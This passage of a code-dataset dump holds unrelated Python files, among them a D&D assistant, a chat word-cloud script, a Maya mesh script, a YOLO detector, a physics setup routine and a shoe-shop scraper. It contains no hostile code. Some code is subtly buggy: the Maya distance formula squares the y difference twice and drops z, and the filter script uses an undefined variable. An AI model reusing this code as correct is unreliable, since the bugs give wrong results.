Please try again.\")\r\n continue\r\n break\r\n\r\n if monster_key == 1:\r\n print_monsters = sorted(monsters.keys(), key=lambda k: monsters[k][\"Challenge Rating\"])\r\n elif monster_key == 2:\r\n print_monsters = sorted(monsters.keys())\r\n\r\n print(\"\")\r\n for monster_name in print_monsters:\r\n print(monster_name + \": CR {}\".format(monsters[monster_name][\"Challenge Rating\"]))\r\n\r\n elif list_or_stat == 2:\r\n while True:\r\n if jumptoprint:\r\n monster_to_print = jumptoprint\r\n else:\r\n monster_to_print = input_str(\"What monster's stats would you like to print? \", True)\r\n if monster_to_print not in monsters.keys():\r\n print(\"Monster not found. Please try again.\")\r\n continue\r\n break\r\n m = monsters[monster_to_print]\r\n print(\"\\n\" + monster_to_print + \": CR {}\".format(m[\"Challenge Rating\"]))\r\n if m[\"Initiative Modifier\"] < 0:\r\n print(\"{} HP, {} AC, {} to Initiative Rolls\".format(m[\"Hit Points\"], m[\"Armor Class\"], m[\"Initiative Modifier\"]))\r\n else:\r\n print(\"{} HP, {} AC, +{} to Initiative Rolls\".format(m[\"Hit Points\"], m[\"Armor Class\"], m[\"Initiative Modifier\"]))\r\n print(\"\\nStats: \" + m[\"Stats\"])\r\n print(\"Description: \" + m[\"Description\"])\r\n print(\"\\nActions\")\r\n if m[\"Multiattack\"]:\r\n print(\"Multiattack: \" + m[\"Multiattack\"])\r\n for a in m[\"Actions\"].keys():\r\n print(\"{}: {}\".format(a, m[\"Actions\"][a]))\r\n\r\ndef monster_helper():\r\n while True:\r\n mcommand = input_num(\"\\nMonster Helper Commands: Print Monster List (1), Print Monster Stats (2), Edit Monster (3), Add or Delete Monster (4), Help (5)\\nCommand (enter 0 to cancel): \", int)\r\n if mcommand == 0:\r\n break\r\n elif mcommand == 1:\r\n print_monsters(1)\r\n break\r\n elif mcommand == 2:\r\n print_monsters(2)\r\n break\r\n elif mcommand == 3:\r\n editmonster()\r\n if monsters != {}:\r\n save(modifiers, monsters)\r\n elif mcommand == 4:\r\n addordeletemonster()\r\n if monsters != {}:\r\n save(modifiers, monsters)\r\n elif mcommand == 5:\r\n print(\"\\nYou can use the Monster Helper to access the bare essentials of a D&D 5e monster's stat block for use on the fly.\\nTo do this, add your own monster via the 'add or delete monsters' command.\\nThe Monster Helper will also work with the Initiative Roller - if you input the name of a saved monster when\\nentering combat with the Initiative Roller, it will automatically use the saved monster's initiative.\")\r\n else:\r\n print(\"Invalid command. Please try again.\")\r\n\r\ndef misc():\r\n global monsters\r\n global modifiers\r\n while True:\r\n micommand = input_num(\"\\nMisc Commands: Conditions and Effects (1), Common Spells (2), Delete Player or Monster Data (3)\\nCommand (enter 0 to cancel): \")\r\n if micommand == 0:\r\n break\r\n elif micommand == 1:\r\n print(\"\\nBelow is a list listing the effects of each condition in 5e.\\n\\nBlinded: Fails sight perception checks, adv. to hit them, disadv. for them to hit\")\r\n print(\"\\nCharmed: Can't harm the charmer, charmer has adv. on social interaction checks with them\")\r\n print(\"\\nCovered: 1/2 Cover = +2 AC and Dex Saves, 3/4 Cover = +5 AC and Dex Saves\")\r\n print(\"\\nFrightened: Disadv. on checks and attacks when source is seen, can't get closer to source\")\r\n print(\"\\nGrappled: 0 speed (grappler 1/2 speed), action for escape contest\")\r\n print(\"\\nHidden: Perception to discover hider, can't normally hide in combat (e.x. except when invisible), adv. 
on next hit\")\r\n print(\"\\nIncapacitated: No actions or reactions\")\r\n print(\"\\nInvisible: Disadv. to hit them, adv. for them to hit, has to take action to Hide\")\r\n print(\"\\nParalyzed: Incapacitated, 0 speed, fails str/dex saves, adv. to hit from range, autocrit in melee\")\r\n print(\"\\nPetrified: Items transform too, incapacitated, oblivious to world, adv. to hit them, resistance to all damage\")\r\n print(\"\\nPoisoned: Disadv. on attacks and checks\")\r\n print(\"\\nProne: 1/2 speed crawl, 1/2 movement to get up, disadv. for them to hit and to hit them from range, adv. to hit them in melee\")\r\n print(\"\\nRestrained: 0 speed, adv. to hit them, disadv. for them to hit, disadv. on dex saves\")\r\n print(\"\\nStunned: 0 speed, incapacitated, fails str/dex saves, adv. to hit them\")\r\n print(\"\\nSurprised: No surprise round - individuals that are surprised are incapacitated until next round\")\r\n print(\"\\nUnconscious: Same as paralyzed, falls prone, is unaware of surroundings\")\r\n print(\"\\nExhausted: Disadv. on checks => 1/2 speed => disadv. on everything => 1/2 max HP => 0 speed => death\\nExhaustion effects stack, -1 exhaustion per long rest\")\r\n break\r\n\r\n elif micommand == 2:\r\n print(\"\\nBelow is a list outlining the effects of a few common spells in 5e. 'X' = spell level\")\r\n print(\"\\nCantrips - X starts at 1, goes up at char. level 5/11/17\")\r\n print(\"Fire Bolt: 120ft attack roll, xd10 fire damage\")\r\n print(\"Vicious Mockery: 60ft, wis save, Xd4 psychic damage and disadv. on next attack\")\r\n print(\"Mage Hand: 30ft from caster, action to use, 30ft movement, 10 pound carry limit\\nArcane Trickster Mage Hand: invis hand, stow or pickpocket, Thieves' Tools, Cunning Action to use, Sleight of Hand vs Perception\")\r\n print(\"Eldritch Blast: 120ft attack roll, X shots of 1d10 force\")\r\n print(\"\\n1st Level Spells\")\r\n print(\"Magic Missile: 2 + X darts (1d4 + 1 force each), can be blocked with Shield\")\r\n print(\"Cure Wounds: touch, heal for Xd8 + ability mod\")\r\n print(\"Command: 60ft wis save on X creatures in 30ft aoe, targets must understand one word command, no direct harm, done on next turn\")\r\n print(\"Healing Word: bonus action 60ft, Xd4 + ability mod heal on 1 creature\")\r\n print(\"Shield: +5 AC reaction to hits or Magic Missile; blocks Magic Missile\")\r\n print(\"Guiding Bolt: 120ft attack roll, (3 + X)d6 radiant, next attacker gets adv. 
before end of your next turn\")\r\n print(\"\\n2nd Level Spells\")\r\n print(\"Darkness: 15ft sphere on non-worn/carried object or a point, everyone inside is Blinded\")\r\n print(\"Hold Person: 60ft wis save on (X - 1) creatures in 30ft aoe, paralyzed on fail, repeat saves on turn ends\")\r\n print(\"Spiritual Weapon: bonus action 60ft concentration, spell attack for (X - 1)d8 + ability mod, bonus action for 20ft move and attack, attacks on summon\")\r\n print(\"Scorching Ray: 120ft attack roll, (X + 1) shots of 2d6 fire\")\r\n print(\"\\n3rd Level Spells\")\r\n print(\"Counterspell: reaction, interrupt spells X level or lower, spellcasting ability check (DC 10 + their spell level) to beat higher level spells\")\r\n print(\"Mass Healing Word: bonus action 60ft, (X - 2)d4 + ability mod heal on 6 creatures\")\r\n print(\"Revivify: 300gp diamond (consumed), touch to undo a non-natural death that happened within 1 min of casting, comes back with 1 HP\")\r\n print(\"\\n4th Level Spells\")\r\n print(\"Banishment: 60ft concentration wis save on (X - 3) creatures, fail sends incapacitated targets to demiplane, they return in 1 min, if the spell isn't interrupted after 1 min they don't return if they are not native to current plane\")\r\n print(\"Fire Shield: 10min, caster gets resistance to cold or fire, melee attackers take 2d8 fire or cold, respectively\")\r\n print(\"Wall of Fire: 1min, 20ft tall and 1ft thick, 60ft long or 20ft diameter, dex save on appearance for (X + 1)d8 fire or half, damaging side of wall does (X + 1)d8 when entering it or ending turn within 10ft\")\r\n print(\"Polymorph: 60min concentration, unwilling targets wis save, new form is beast less than or equal to target's CR/level, extra HP pool, all stats replaced, gear melds into them\")\r\n\r\n elif micommand == 3:\r\n while True:\r\n delete = input_num(\"Would you like to delete all player data (1) or all monster data (2) (enter 0 to cancel)? \", int)\r\n if delete == 0:\r\n break\r\n elif delete == 1:\r\n if modifiers == {}:\r\n print(\"\\nThere is no player data to delete.\")\r\n elif input_question(\"This action is irreversible. Are you sure you want to delete all player data (Y/N)? \", [\"y\", \"n\"]) == \"y\":\r\n modifiers = {}\r\n save(modifiers, monsters)\r\n print(\"\\nPlayer data successfully deleted.\")\r\n break\r\n elif delete == 2:\r\n if monsters == {}:\r\n print(\"\\nThere is no monster data to delete.\")\r\n elif input_question(\"This action is irreversible. Are you sure you want to delete all monster data (Y/N)? \", [\"y\", \"n\"]) == \"y\":\r\n monsters = {}\r\n save(modifiers, monsters)\r\n print(\"\\nMonster data successfully deleted.\")\r\n break\r\n else:\r\n print(\"Invalid command. Please try again.\")\r\n break\r\n\r\n else:\r\n print(\"Invalid command. Please try again.\")\r\n\r\nwhile True:\r\n command = input_num(\"\\nCommands: Quit (1), Initiative Roller (2), Monster Helper (3), Dice Roller (4), Misc (5)\\nCommand: \", int)\r\n if command == 1:\r\n break\r\n elif command == 2:\r\n initiative_roller()\r\n elif command == 3:\r\n monster_helper()\r\n elif command == 4:\r\n XdY_Z_roller()\r\n elif command == 5:\r\n misc()\r\n else:\r\n print(\"Invalid command. 
Please try again.\")","sub_path":"Dungeons and Dragons/dm_assistant.py","file_name":"dm_assistant.py","file_ext":"py","file_size_in_byte":25091,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"263380965","text":"# -*- coding: utf-8 -*-\n# @Author: zhr\n# @Date: 2020-03-05 11:27:20\n# @Last Modified by: zhr\n# @Last Modified time: 2020-03-05 12:27:29\n# -*- coding: utf-8 -*-\n# @Author: zhr\n# @Date: 2020-03-05 08:54:47\n# @Last Modified by: zhr\n# @Last Modified time: 2020-03-05 11:26:25\nimport jieba\nimport re\nimport collections\nimport wordcloud\nfrom PIL import Image\nimport matplotlib.pyplot as plt \nimport numpy as np \n\nf1 = open(\"滚去学习(2377919782).txt\", \"r\", encoding=\"utf-8\")\nzhr_name = [\"东都大白兔\", \"name=main\", \"今天必须早睡\"]\nzyf_name = [\"18 环境 张一帆\", \"洛安。\", \"帆大讯飞\", \"小帆讯飞\", \"别找她!舔狗!\", \"别生气,别冲动,别理她\", \"快去学习\", \"滚去学习\"]\ntimepat = re.compile(r\"\\d{4}-\\d{1,2}-\\d{1,2}\")\n\nnzyf = 0\nnzhr = 0\nflag = 0\nlines = f1.readlines()\nzyf_s = []\nzhr_s = []\nfor line in lines:\n\tline = line.replace(\"[图片]\", \"\")\n\tline = line.replace(\"[表情]\", \"\")\n\tline = line.replace(\"\\n\", \"\")\n\tif flag == \"zyf\":\n\t\tzyf_s.append(line)\n\t\tflag = 0\n\tif flag == \"zhr\":\n\t\tzhr_s.append(line)\n\t\tflag = 0\n\tif re.search(timepat, line):\n\t\tfor w in zyf_name:\n\t\t\tif w in line:\n\t\t\t\tflag = \"zyf\"\n\t\t\t\tbreak\n\t\tfor w in zhr_name:\n\t\t\tif w in line:\n\t\t\t\tflag = \"zhr\"\n\t\t\t\tbreak\n\nprint(len(zhr_s))\nprint(len(zyf_s))\nprint(zhr_s[0:20])\n\nremove_words = [u'的', u',',u'和', u'是', u'随着', u'对于', u'对',u'等',u'能',u'都',u'。',u' ',u'、',u'中',u'在',u'了',\n u'通常',u'如果',u'我们',u'需要',u'我',u'你',u'?',u\"\",u\" \",u\"就\",u\"不\",\"啊\",\n u\"吧\",u\"也\",u\"不是\",u\"就是\",u\"什么\",u\"怎么\",\n u\"这个\",u\"这么\",u\"一个\"]\nk = 0\nwords = []\nfor s in zhr_s:\n\tif \"赵先生\" in s:\n\t\twords.append(\"赵先生\")\n\tk += 1\n\tthelist = jieba.cut(s, cut_all = False)\n\tfor word in thelist:\n\t\tif word not in remove_words:\n\t\t\tif len(word) > 1:\n\t\t\t\twords.append(word)\n\t\t\tif k < 20:\n\t\t\t\tprint(word)\n\nword_counts = collections.Counter(words)\nwords_top10 = word_counts.most_common(50)\nprint(words_top10)\n\nmask = np.array(Image.open(\"cloud3.jpg\"))\nwc = wordcloud.WordCloud(\n\tbackground_color=\"white\",\n\tfont_path='zi.ttf',\n\tmask=mask,\n\tmax_words=200,\n\tmax_font_size=500\n\t)\n\nwc.generate_from_frequencies(word_counts)\nimage_colors = wordcloud.ImageColorGenerator(mask)\nwc.recolor(color_func=image_colors)\nplt.imshow(wc)\nplt.axis('off')\nplt.savefig(\"zhr2.png\", dpi=300)\nplt.show()\n\n\n\n\n\n\n\n\n\n","sub_path":"QQmessages/zyf_zhr.py","file_name":"zyf_zhr.py","file_ext":"py","file_size_in_byte":2389,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"276760821","text":"import maya.cmds as cmds\nimport math as m\nsel=cmds.ls(sl=1, fl=1)\nwPos=[]\nfor each in sel:\n wPos.append(cmds.xform(each, q=1, ws=1, t=1))\ndict=zip(sel, wPos)\n\nfor src in dict:\n dist=[]\n targ=[]\n others=dict[:]\n x1=src[1][0] \n y1=src[1][1]\n z1=src[1][2]\n others.remove(src)\n for tar in others:\n x2=tar[1][0] \n y2=tar[1][1]\n z2=tar[1][2]\n xx=x1-x2\n yy=y1-y2\n zz=z1-z2\n targ.append(tar[0])\n dist.append(m.sqrt((m.pow(xx,2))+(m.pow(yy,2))+(m.pow(yy,2))))\n dist2=dist[:]\n min1=min(dist)\n dist2.remove(min1)\n min2=min(dist2)\n index1=dist.index(min(dist))\n index2=dist.index(min(dist2))\n p1=cmds.xform(src[0], q=1, ws=1, t=1)\n p2=cmds.xform(targ[index1], q=1, ws=1, 
t=1)\n p3=cmds.xform(targ[index2], q=1, ws=1, t=1)\n cmds.polyCreateFacet(p=[tuple(p1),tuple(p2),tuple(p3)])","sub_path":"scripts/python/maya/misc/polymeshFromLocs.py","file_name":"polymeshFromLocs.py","file_ext":"py","file_size_in_byte":878,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"244458840","text":"#!/usr/bin/env python2\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed Feb 22 10:56:38 2017\n\n@author: raad\n\"\"\"\n\nfrom ID12_bleeding_2comp import *\nimport gc\n\nB = 0.03\nm = 0.5\nr_i = 2.5\n#a = 0.85\nr_o=18.\n\ndata = np.genfromtxt('/home/raad/PhD/Data/Work_Dir/2compmodel21feb17/comptwo_refl_components.qdp', skip_header = 3)\n\nE_range_raw = data[:,0]\ndE_raw, F_all_raw, F_out_raw, F_in_raw, F_refl_raw = data[:,1], data[:,2], data[:,3], data[:,4], data[:,5]\nF_all_raw, F_out_raw, F_in_raw, F_refl_raw = F_all_raw/(E_range_raw), F_out_raw/(E_range_raw), F_in_raw/(E_range_raw), F_refl_raw/(E_range_raw)\n\nbins = np.logspace(0, 1.6, 80)\ndigitized = np.digitize(E_range_raw, bins)\nE_range = np.asarray([E_range_raw[digitized == i].mean() for i in range(1, len(bins))])\ndE = np.asarray([dE_raw[digitized == i].mean() for i in range(1, len(bins))])\nF_all = np.asarray([F_all_raw[digitized == i].mean() for i in range(1, len(bins))])\nF_in = np.asarray([F_in_raw[digitized == i].mean() for i in range(1, len(bins))])\nF_out = np.asarray([F_out_raw[digitized == i].mean() for i in range(1, len(bins))])\nF_refl = np.asarray([F_refl_raw[digitized == i].mean() for i in range(1, len(bins))])\n\ndE = dE[np.logical_not(np.isnan(E_range))]\nF_all = F_all[np.logical_not(np.isnan(E_range))]\nF_in = F_in[np.logical_not(np.isnan(E_range))]\nF_out = F_out[np.logical_not(np.isnan(E_range))]\nF_refl = F_refl[np.logical_not(np.isnan(E_range))]\nE_range = E_range[np.logical_not(np.isnan(E_range))]\n\ndef emissivity1(r, r_i):\n '''\n Simple form for the disc emissivity at radius, r x R_g.\n '''\n\n return r**(-4.5)\n\ndef emissivity2(r, r_i):\n '''\n Simple form for the disc emissivity at radius, r x R_g.\n '''\n\n return r**(-3.) 
* 3 * (1-sqrt(2.5/r))\n\ndef r(f):\n return (2*pi*R_g * f / (B*c))**(-1/(m+(3./2.)))\n\nemissr1 = lambda r: emissivity1(r, r_i)*r\n\n#r_bins = r_bounds(r_o, r_i)\n\n#rs = np.asarray([(r_bins[i+1]+r_bins[i])/2 for i in range(len(r_bins)-1)]) \n\n#fs = np.logspace(-2, 1.4, 100)\n\n#rs = r(fs)\n#r_i = min(rs)\n#r_o = max(rs)\n\n#fs = f_alpha(rs, B, m)\n\nYs = np.array(())\n\nfor i in range(len(rs)):\n #tot = (np.sum((ems1 * rs * drs)[i:]) / np.sum((ems1 * rs * drs)))**2\n \n #Ys = np.append(Ys, tot)\n r = rs[i]\n if r > 8.7:\n \n num = integrate.quad(emissr1, r_i, 8.7)[0] * integrate.simps(F_in_raw, E_range_raw) + integrate.quad(emissr1, 8.7, r)[0] * integrate.simps(F_out_raw, E_range_raw)\n denom = integrate.quad(emissr1, 8.7, r_o)[0]*integrate.simps(F_out_raw, E_range_raw) + integrate.quad(emissr1, r_i, 8.7)[0]*integrate.simps(F_in_raw, E_range_raw)\n Ys = np.append(Ys, num/denom)\n \n if r < 8.7:\n \n num = integrate.quad(emissr1, r_i, r)[0] * integrate.simps(F_in_raw, E_range_raw)\n denom = integrate.quad(emissr1, 8.7, r_o)[0]*integrate.simps(F_out_raw, E_range_raw) + integrate.quad(emissr1, r_i, 8.7)[0]*integrate.simps(F_in_raw, E_range_raw)\n Ys = np.append(Ys, num/denom)\n\nfs = f_alpha(rs, B, m)\n\n\nemissr2 = lambda r: emissivity2(r, r_i)*r\nZs = np.array(())\n\nfor i in range(len(rs)):\n\n r = rs[i]\n if r > 8.7:\n \n num = integrate.quad(emissr2, r_i, 8.7)[0] * integrate.simps(F_in_raw, E_range_raw) + integrate.quad(emissr2, 8.7, r)[0] * integrate.simps(F_out_raw, E_range_raw)\n denom = integrate.quad(emissr2, 8.7, r_o)[0]*integrate.simps(F_out_raw, E_range_raw) + integrate.quad(emissr2, r_i, 8.7)[0]*integrate.simps(F_in_raw, E_range_raw)\n Zs = np.append(Zs, num/denom)\n \n if r < 8.7:\n \n num = integrate.quad(emissr2, r_i, r)[0] * integrate.simps(F_in_raw, E_range_raw)\n denom = integrate.quad(emissr2, 8.7, r_o)[0]*integrate.simps(F_out_raw, E_range_raw) + integrate.quad(emissr2, r_i, 8.7)[0]*integrate.simps(F_in_raw, E_range_raw)\n Zs = np.append(Zs, num/denom)\n \nf, ax = plt.subplots()\n\nax.plot(fs, Ys**2)\nax.plot(fs, Zs**2)\nax.set_ylim(0.0003, 1.5)\nax.set_xlim(0.021,34.7)\nax.set_yscale('log')\nax.set_xscale('log')\nax.set_ylabel(r'$F$')\nax.set_xlabel(r'$f$ $(Hz)$')\n\n\nplt.show()","sub_path":"Archive/filterfunction_withenergyspectra.py","file_name":"filterfunction_withenergyspectra.py","file_ext":"py","file_size_in_byte":4031,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"424443037","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import migrations, models\nfrom django.conf import settings\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n migrations.swappable_dependency(settings.AUTH_USER_MODEL),\n ('posts', '0001_initial'),\n ]\n\n operations = [\n migrations.AddField(\n model_name='myuser',\n name='favourites_users',\n field=models.ManyToManyField(related_name='followers', verbose_name='\\u0418\\u0437\\u0431\\u0440\\u0430\\u043d\\u043d\\u044b\\u0435 \\u043f\\u043e\\u043b\\u044c\\u0437\\u043e\\u0432\\u0430\\u0442\\u0435\\u043b\\u0438', to=settings.AUTH_USER_MODEL, blank=True),\n ),\n migrations.AddField(\n model_name='post',\n name='scores',\n field=models.IntegerField(default=0, verbose_name='\\u041f\\u0440\\u043e\\u0441\\u043c\\u043e\\u0442\\u0440\\u044b'),\n ),\n 
]\n","sub_path":"posts/migrations/0002_auto_20151211_0654.py","file_name":"0002_auto_20151211_0654.py","file_ext":"py","file_size_in_byte":918,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"185308049","text":"\"\"\"\nПоследовательность Фибоначчи определяется так:\n0,1,1,2,3,5,8...F_{n}=F_{n-2}+F_{n-1}.\nПо данному числу n определите n-е число Фибоначчи.\n0, 1, 1, 2, 3, 5, 8, 13, 21, 34, 55, 89, 144, 233, 377, 610, 987 ...\n\"\"\"\n\nn = int(input('n: '))\n\np = 1 # pred chislo\ne = 1 # eto\ns = 0 # sled\ns2 = 0 # sled 2\n\nfor i in range(n):\n p = e\n e = s2\n s = p + e\n s2 = s\n\nprint(s)\n","sub_path":"mccme/07-while/07-17.py","file_name":"07-17.py","file_ext":"py","file_size_in_byte":463,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"574763350","text":"#!/usr/bin/env python3\n\nimport os\nimport os.path\nimport time\nimport numpy as np\nimport cv2\n\nclass Yolo(object):\n\n labels_path = 'coco.names'\n weights_path = 'yolov3.weights'\n config_path = 'yolov3.cfg'\n confidence = 0.5 # Minimum probability to filter out detections\n threshold = 0.3 # Threshold when applying non-maxima suppression\n\n def __init__(self):\n\n if not os.path.isfile(self.weights_path):\n print(\"Assembling {} file...\".format(self.weights_path))\n os.system('cat {0}.* > {0}'.format(self.weights_path))\n\n # Load the COCO class labels that the YOLO model was trained on\n self.labels = open(self.labels_path).read().strip().split('\\n')\n\n # Initialize a list of colors to represent each possible class label\n np.random.seed(42)\n self.colors = np.random.randint(0, 255, size=(len(self.labels), 3), dtype='uint8')\n\n # Load the YOLO object detector trained on the COCO dataset (80 classes)\n self.net = cv2.dnn.readNetFromDarknet(self.config_path, self.weights_path)\n\n # Determine the output layer names that are needed from YOLO\n self.ln = self.net.getLayerNames()\n self.ln = [self.ln[i[0] - 1] for i in self.net.getUnconnectedOutLayers()]\n\n def run(self, image):\n\n # Construct a blob from the image and perform a forward pass of the object detector\n blob = cv2.dnn.blobFromImage(image, 1 / 255.0, (416, 416), swapRB=True, crop=False)\n self.net.setInput(blob)\n start = time.time()\n layerOutputs = self.net.forward(self.ln)\n end = time.time()\n print('YOLO took {:.6f} seconds'.format(end - start))\n\n # Initialize lists of detected bounding boxes, confidences, and class IDs\n boxes = []\n confidences = []\n classIDs = []\n\n (H, W) = image.shape[:2]\n for output in layerOutputs:\n for detection in output:\n scores = detection[5:]\n classID = np.argmax(scores)\n confidence = scores[classID]\n if confidence > self.confidence:\n # Scale the bounding box coordinates back relative to the size of the image\n box = detection[0:4] * np.array([W, H, W, H])\n (centerX, centerY, width, height) = box.astype('int')\n # Derive the top left corner of the bounding box\n x = int(centerX - (width / 2))\n y = int(centerY - (height / 2))\n # Update the list of bounding box coordinates, confidences, and class IDs\n boxes.append([x, y, int(width), int(height)])\n confidences.append(float(confidence))\n classIDs.append(classID)\n\n # Apply non-maxima suppression to suppress weak, overlapping bounding boxes\n idxs = cv2.dnn.NMSBoxes(boxes, confidences, self.confidence, self.threshold)\n\n # Ensure at least one detection exists and loop over the indexes we are keeping\n if len(idxs) > 0:\n for i in idxs.flatten():\n # 
Extract the bounding box coordinates\n (x, y) = (boxes[i][0], boxes[i][1])\n (w, h) = (boxes[i][2], boxes[i][3])\n # Draw a bounding box rectangle and label on the image\n color = [int(c) for c in self.colors[classIDs[i]]]\n cv2.rectangle(image, (x, y), (x + w, y + h), color, 2)\n text = '{}: {:.4f}'.format(self.labels[classIDs[i]], confidences[i])\n cv2.putText(image, text, (x, y - 5), cv2.FONT_HERSHEY_SIMPLEX, 0.5, color, 2)\n\nif __name__ == '__main__':\n yolo = Yolo()\n\n # Load and run the input image\n image = cv2.imread('baggage_claim.jpg')\n yolo.run(image)\n\n # Display the output image\n cv2.imshow('Image', image)\n cv2.waitKey(10000)\n","sub_path":"yolo/yolo.py","file_name":"yolo.py","file_ext":"py","file_size_in_byte":3875,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"29946736","text":"import math\n\ndef SETUPT(Magboltz):\n Magboltz.API = math.acos(-1.0)\n TWOPI = 2.0 * Magboltz.API\n Magboltz.ARY = 13.60569253\n PIR2 = 8.7973554297e-17\n ECHARG = 1.602176565e-19\n EMASS = 9.10938291e-31\n AMU = 1.660538921e-27\n BOLTZ = 8.6173324e-5\n BOLTZJ = 1.3806488e-23\n AWB = 1.758820088e10\n ALOSCH = 2.6867805e19\n EOVM = math.sqrt(2.0 * ECHARG / EMASS) * 100.0\n ABZERO = 273.15\n ATMOS = 760.0\n Magboltz.CONST1 = AWB / 2.0 * 1.0e-19\n Magboltz.CONST2 = Magboltz.CONST1* 1.0e-02\n Magboltz.CONST3 = math.sqrt(0.2 * AWB) * 1.0e-9\n Magboltz.CONST4 = Magboltz.CONST3 * ALOSCH * 1.0e-15\n Magboltz.CONST5 = Magboltz.CONST3 / 2.0\n Magboltz.CORR = ABZERO * Magboltz.TORR / (ATMOS * (ABZERO + Magboltz.TEMPC) * 100.0)\n Magboltz.NANISO =2\n Magboltz.NCOLM = 400000\n Magboltz.NCORLN = 50000\n Magboltz.NCORST = 4\n MXEKR = 0\n for IH in range(Magboltz.NGAS):\n if Magboltz.NGASN[IH] == 2 or Magboltz.NGASN[IH] == 6 or Magboltz.NGASN[IH] == 7:\n MXEKR = IH\n if Magboltz.EFIELD > (10 / Magboltz.CORR):\n MXEKR = -1\n if MXEKR != -1:\n if Magboltz.NGAS == 1:\n Magboltz.NCOLM = 2000000\n Magboltz.NCORLN = 500000\n Magboltz.NCORST = 2\n elif Magboltz.FRAC[MXEKR] > 90.0:\n Magboltz.NCOLM = 2000000\n Magboltz.NCORLN = 500000\n Magboltz.NCORST = 2\n TOTFRAC = 0.0\n if Magboltz.NGAS == 0 or Magboltz.NGAS > 6:\n raise ValueError(\"Error in Gas Input\")\n\n for J in range(Magboltz.NGAS):\n if Magboltz.NGASN[J] == 0 or Magboltz.FRAC[J] == 0:\n raise ValueError(\"Error in Gas Input\")\n TOTFRAC += Magboltz.FRAC[J]\n if abs(TOTFRAC - 100) >= 1e-6:\n raise ValueError(\"Error in Gas Input\")\n Magboltz.TMAX = 100.0\n NSCALE = 40000000\n Magboltz.NMAX = Magboltz.NMAX * NSCALE\n\n if Magboltz.NMAX < 0:\n raise ValueError(\"NMAX value is too large - overflow\")\n Magboltz.NSTEP = 4000\n Magboltz.THETA = 0.785\n Magboltz.PHI = 0.1\n Magboltz.ESTART = Magboltz.EFINAL / 50.0\n Magboltz.RSTART=0.666\n Magboltz.CORR = ABZERO * Magboltz.TORR / (ATMOS * (ABZERO + Magboltz.TEMPC) * 100.0)\n\n Magboltz.AKT = (ABZERO + Magboltz.TEMPC) * BOLTZ\n Magboltz.ANN = [Magboltz.FRAC[i] * Magboltz.CORR * ALOSCH for i in range(6)]\n Magboltz.AN = 100.0 * Magboltz.CORR * ALOSCH\n Magboltz.VANN = [Magboltz.FRAC[i] * Magboltz.CORR * Magboltz.CONST4 * 1e15 for i in range(6)]\n Magboltz.VAN = 100.0 * Magboltz.CORR * Magboltz.CONST4 * 1.0e15\n\n Magboltz.WB = AWB * Magboltz.BMAG * 1e-12\n\n if Magboltz.BMAG == 0:\n return\n Magboltz.EOVB = Magboltz.EFIELD *1e-9/Magboltz.BMAG\n return\n","sub_path":"src/Scripts/Python/SETUPT.py","file_name":"SETUPT.py","file_ext":"py","file_size_in_byte":2712,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} 
+{"seq_id":"177032751","text":"import time\nfrom scrapy.http import Request\nfrom datetime import datetime\nfrom selenium import webdriver\nfrom scrapy.selector import Selector\nfrom scrapy.linkextractors import LinkExtractor\nfrom scrapy.spiders import CrawlSpider, Rule\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.support.ui import WebDriverWait\n\nfrom esmio.items import Item\n\nfrom pymongo import MongoClient\n\nfrom text_parser import price_normalize, html_text_normalize\n\nfrom esmio.spiders.miocrawler import MioCrawler\n\nclass BenditoPie(MioCrawler):\n name = 'benditopie'\n allowed_domains = ['benditopie.com']\n\n start_urls = ['https://benditopie.com/collections/zapatos-1?page=' + str(i) for i in range(1,7)]\n \n rules = [\n # Rule(LinkExtractor(restrict_xpaths=\"//a[@class='f-linkNota']\"), callback='parse_item', follow=True)\n # Rule(LinkExtractor(allow_domains=allowed_domains), callback='parse_item', follow=True)\n ]\n\n def parse(self, response):\n print(\"------------- Crawling ----------------\")\n self.browser.get(response.url)\n sel = Selector(text=self.browser.page_source)\n links = sel.xpath('.//a[@class=\"product-image view-alt\"]/@href')\n for link in links:\n url_txt = 'https://benditopie.com/' + link.extract()\n print(\"------------Found new link: \"+str(url_txt))\n yield Request(url_txt, callback=self.parse_item)\n\n def parse_item(self, response):\n if self.links.find_one({\"_id\": response.url}) is None:\n print(\"------------- New Item ----------------\")\n self.browser.get(response.url)\n time.sleep(2)\n source = self.browser.page_source\n sel = Selector(text=source)\n item = Item()\n item['created_at'] = datetime.now()\n item['url'] = response.url\n item['brand'] = 'benditopie'\n item['breadcrumb'] = []\n item['title'] = sel.xpath('.//h1[@itemprop=\"name\"]/text()').extract()[0]\n item['description'] = html_text_normalize(sel.xpath('.//div[@itemprop=\"description\"]//span/text()').extract())\n item['code'] = ''\n item['price'] = price_normalize(sel.xpath('.//span[@itemprop=\"price\"]/text()').extract()[0])\n size_labels = sel.xpath('.//select[@id=\"ProductSelect-product-template\"]/option[not(contains(text(),\"gotado\"))]/text()').extract()\n item['sizes'] = [label.strip()[:2] for label in size_labels]\n image_urls = sel.xpath('.//ul[@id=\"ProductThumbs-product-template\"]/li/a/@href').extract()\n item['image_urls'] = [url[2:] for url in image_urls]\n yield item\n else:\n print(\"-------------- OLD -------------\")","sub_path":"esmio/spiders/benditopie.py","file_name":"benditopie.py","file_ext":"py","file_size_in_byte":2745,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"406625828","text":"import os\nfrom shutil import copyfile, move\n\n# flip along z-axis\n# image000 --> image max\n\nsrc_dir = '/home/hyoseok/research/medical/aaa/dataset/'\ntgt_dir = '/home/hyoseok/research/medical/aaa/dataset/'\n\ndir_list = os.listdir(src_dir + '/raw')\n\nfor entry in dir_list:\n file_list = os.listdir(src_dir + '/raw/' + 